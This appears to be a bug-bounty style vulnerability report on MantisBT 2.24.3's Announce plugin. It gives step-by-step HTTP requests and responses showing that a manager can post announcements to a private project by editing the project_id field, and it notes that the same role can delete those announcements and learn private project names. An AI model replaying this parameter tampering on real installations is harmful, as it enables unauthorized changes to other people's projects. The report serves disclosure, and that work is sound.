Non authenticated member can post a news to a private project

[jrckmcsb]

When the admin enable the news section a new stuffs will appear like the main field which will use for announcement/news. Some user can have access on it (manager). However it seems that a lot of security issue introduce here..

Description

This allows the attacker to post announcement on a private project even you are not part of it

Steps to produce

• Create two projects public and private
• enable the news
• As admin post a news to that private project

Request

POST /mantisbt-2.24.3/plugin.php?page=Announce/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Cookie: MANTIS_collapse_settings=|sidebar:0; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_PROJECT_COOKIE=1; PHPSESSID=7usorjepb776qjidi5qsg8elb8; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=c16e1a2abfe29f2ae0cd4722fa1d69c8883f2fb7ed79ca412b5b72293cb1e84b; MANTIS_MANAGE_USERS_COOKIE=0%3Ausername%3AASC%3A0; MANTIS_BUG_LIST_COOKIE=9
Upgrade-Insecure-Requests: 1

plugin_Announce_create_token=20201002ulRDzusShT_qtfzjQvzOJrSdwaEg2G05&title=AWESOME+NEWS+FOR+PRIVATE+PROJECT&message=AWESOME+NEWS+FOR+PRIVATE+PROJECT&location=header&project_id=1&access=10&ttl=0&dismissable=on

Response

HTTP/1.1 302 Found
Date: Fri, 02 Oct 2020 11:27:50 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 02 Oct 2020 11:27:51 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 02 Oct 2020 11:27:51 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

• Here I using a private project with project_id of 1

Manager as attacker

• Create a new announcement

Request

POST /mantisbt-2.24.3/plugin.php?page=Announce/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Cookie: MANTIS_collapse_settings=|monitored:1; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=2; PHPSESSID=24tihn6miqrj33tjrdleo94ef4; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=v7kQ0OCxCPCnyNcBXEGWqV5Oj4UaowOhahhT0UBedcplivtLAgZS-zGkJQOFiIMj; MANTIS_BUG_LIST_COOKIE=5%2C1%2C4
Upgrade-Insecure-Requests: 1

plugin_Announce_create_token=20201002mANdg2UBhW7V-buExLRrPmNcxZ3HrCN2&title=This+is+some+announcement+for+public+project&message=This+is+some+announcement+for+public+project&location=header&project_id=0&access=10&ttl=0&dismissable=on

Response

HTTP/1.1 302 Found
Date: Fri, 02 Oct 2020 11:35:36 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Fri, 02 Oct 2020 11:35:36 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Fri, 02 Oct 2020 11:35:36 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt-2.24.3/plugin.php?page=Announce/list
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8

• Do the same thing but this time edit the project_id to any private project
• Send it
• The news will send to that private project

Some notes

These are the stuffs that I observe but I am not sure if this is just part of the configuration feature (this can be prevent if the admin just set the configuration to admin..)

Delete news for private project

• allows the manager to delete the news/announcement for that private project

View the private project name

• allows to disclose the private project name

All these stuffs can be done after going to plugin.php?page=Announce/list I just add this information.... I believe these issues should be consider to fix/update